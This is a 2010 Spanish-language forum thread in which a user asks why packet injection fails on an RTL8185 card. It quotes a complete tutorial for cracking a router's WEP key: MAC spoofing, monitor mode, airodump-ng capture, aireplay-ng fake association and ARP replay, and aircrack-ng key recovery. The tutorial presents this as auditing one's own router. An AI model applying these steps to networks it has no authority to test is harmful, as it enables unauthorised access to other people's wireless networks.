ayuda! No puedo inyectar paquetes!!

Iniciado por ivenancio, 27 Diciembre 2010, 02:53 AM

0 Miembros y 1 Visitante están viendo este tema.

ivenancio

hola a todos..   mi problema es el siguiente.

tengo una tarjeta rtl8185 he leido mil veces el tutorial wifislax3.1 con rtl8185 54m consulte otras fuentes y corregi algunos problemas como cambiar el canal de el AP espesificar  en RATE la conexcion en megas descarge un controlador diferente porque
el que indican en el post que ya mencione no me funciono. Con el que descarge si se instalo el driver y si se cambio a modo minitor, solo que cuando indico la mac Falsa 11:22:33:44:55:66 y luego intento asociar la perp no pasa nada, luego cambio la mac por 00:11:22:33:44:55 y si crea la asociacion (me manda el mensaje "Association successful :-)" pero al tratar de inyectar paquetes no pasa nada quisiera que me pudieran orientar nose que debo hacer talvez pdrian decirme cuales son las posibles causas o que estoy haciendo mal.

cabe mencionar que soy nuevo y hay muchas cosas que no entiendo.

ojala que alguien me ayude y de antemano les doy las gracias
y decir que este foro me ha ayudado a aprender lo poco que se son lo maximo ;-)

Belial & Grimoire

hola

creo que estas intentando hacer una auditoria.. mira, yo tengo una realtek pero de otra version parecida (rtl8187)...

puede ser por varias cosas que te pasa eso, una vez eso me paso porque estaba muy lejos el modem al que intente auditar, tambien puede pasar que cuando vas a inyectar tienes que usar mon0 en vez de wlan0... en todo el inicio si es wlan0, pero solo cuando ya vas a empezar a inyectar para que te aparezca el mensaje "successfull" utiliza mon0 en todo lo demas, tambien tengo que decir que yo pude hacerlo mas facilmente con wifiway, pero eso es solo un consejo.

espero esto te sirva sino mejor coloca algo mas especifico de lo que intentas hacer para ayudarte mejor

salu2
.                                 

ivenancio

hola gracias por responder

basicamente la informacion sobre la cual ne estoy basando es esta:

---------------------------------------------------------------------------------------------
COMPROBANDO LA SEGURIDAD DE NUESTRO RUTEADOR
Utilizando la tarjeta de red RTL 8185 54M en modo monitor con la distribución de Linux wifislax 3.1, vamos a ver los pasos necesarios para asegurarnos de que tenemos seguro nuestro ruteador.
1.- DESCARGAMOS EL CONTROLADOR ADECUADO DESDE REALTEK:
Esta se encuentra en la siguiente ruta:
http://www.realtek.com.tw/downloads/downloadsView.aspx?Langid=1&PNid=1&PFid=1&Level=6&Conn=5&DownTypeID=3&GetDown=false&Downloads=true#RTL8185L Ahí puedes elegir cualquier servidor
http://ftp://66.104.77.130/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz
http://ftp://152.104.238.19/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz
http://ftp://61.56.69.18/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz
NOTA: Guardamos el archivo descargado en la usb para posteriormente copiarlo en wifislax 3.1
2.- UNA VEZ REALIZADA LA DESCARGA PROCEDEMOS A DESCOMPRIMIR Y COMPILAR
#tar -xvf rtl8185_linux_26[1].1027.0823.2007.tar.gz
#cd rtl8185_linux_26.1027.0823.2007
#./makedrv
#./wlan0up
3.- AHORA PROBAMOS QUE REALMENTE YA ESTA LA TARJETA, SI ES EL CASO LO PONEMOS EN MODO MONITOR
#iwconfig
#ifconfig wlan0 down
#ifconfig wlan0 hw ether 11:22:33:44:55:66
#modprobe -r ath_pci
#modprobe ath_pci autocreate=monitor
#iwconfig wlan0 mode monitor
#iwconfig
4.- LO LEVANTAMOS
#ifconfig wlan0 up
5.- VAMOS A IDENTIFICAR NUESTRO RUTEADOR
#airodump-ng wlan0
Anotamos los datos mínimos necesarios tales como el ESSID,BSSID y MAC.
Ahora nos ubicamos adecuadamente en nuestro caso en rate 1 y canal 6
#iwconfig wlan0 rate 1M channel 6
6.- INICIAMOS AIRMON Y VERIFICAMOS QUE YA TENEMOS NUESTRA INTERFACE EN MODO MONITOR
#airmon-ng start wlan0
Vemos que nos da el siguiente resultado
Interface Chipset Driver
wlan0 RTL8187 r8187 (monitor mode enabled)
7.- EMPEZAMOS A CAPTURAR TRAFICO CON AIRODUMP
#airodump-ng -w pas6 -c 6 wlan0
Seleccionamos el SSID (INFINITUMXXXX) y la direccion MAC(XX:XX:XX:XX:XX:XX) para verificar la seguridad de nuestro ruteador
Dejamos abierta la ventana y en ejecucion airodump
8.- CREAMOS UNA ASOCIACION AP CON AIREPLAY-NG
Abrimos un nuevo shell y tecleamos lo siguiente:
#aireplay-ng -1 0 -e INFINITUMXXXX -a XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0
En este punto vamos a intentarlo repetidamente hasta que obtengamos el mensaje:
Association successful :-)
9.- AHORA INYECTAMOS TRAFICO CON AIREPLAY
#aireplay-ng -3 -b XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0
Vemos que se empiezan a enviar y recibir paquetes
Y si checamos la ventana donde esta trabajando airodump se ve que se empiezan a generar los IV's, aqui esperamos hasta llegar unos 160,000 aproximandamente
10.- VAMOS A SACAR LA CLAVE CON AIRCRACK
Revisamos que este el archivo .cap en la ruta actual
#ls
#cd rtl8185_linux_26.1027.0823.2007 (el mio se quedo aquí)
#aircrack-ng pas6-01.cap
Seleccionamos el router : 1
INFINITUMXXXX
Y en unos instantes obtenemos el key:
KEY FOUND [34:67:34:65:75]
11.- INTRODUCIMOS LA CLAVE A NUESTRA TARJETA
Reiniciamos la PC, (porque despues aunque cambiemos el modo a managed no se conecta), volvemos a cargar los drivers (paso2)
Lo levantamos por si acaso
#ifconfi wlan0 up

y checamos con:
#iwconfig wlan0

Nos conectamos con nuestra clave (NO LA DEL VECINO) desde
1) wifislax-asistencia herramientas-wireless
wifislax wireles

Introducimos
la interface: wlan0
el ssid:INFINITUMXXXX
el canal:6
la clave:3467346575

2) wifislax-asistencia herramientas-wireless
asistencia redes
dhcp

#ifconfig wlan0
13.- POR ULTIMO VERIFICAMOS CON PING Y A NAVEGAR EN INTERNET
#ping www.google.com.mx
-------------------------------------------------------------------------------------------

que tome de esta direccion  http://foro.elhacker.net/wireless_en_linux/wifislax_31_con_rtl_8185_54m-t213096.0.html

estoy casi seguro de que todo anda bien, en el paso No. 8 me manda el mensaje Association successful :-)

pero en el No. 9 al escribir la orden no captura paquetes solo se queda en esto

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 0 ARP requests), sent 0 packets...

read si aumenta pero no pasa na da mas

ojala al guien puesda ayudarme

gracias .....


Belial & Grimoire

hola

escribe en la consola iwconfig y ve si te aparece mon0

si te aparece entonces desde el punto No.8 en vez de escribir wlan0 escribe mon0 y ve que pasa

si no se puede entonces dejalo como 30 min a ver si toma algo, si sigue sin moverse entonces la señal o esta muy lejos, tu señal es muy baja o deseguro esta suspendido el modem al que le haces la auditoria,  a mi me ha pasado que me aparecen señales pero no puedo hacer nada porque los apagan, pero no totalmente

salu2
.                                 

ivenancio

creo que probablemente sea que estoy muy lejos  de el router ....
aunque intentare dejarlo mas tiempo.

por ultimo, en algunos post he leido que los RTL8185 no son compatibles para inyeccion de trafico ¿es verdad?

aunque el tutorial que publicaro se supone que esta probado y eso quiere decir que
si es compatible....

bueno muchisimas gracias Belial & Grimoire por atender mis dudas
un saludo a todos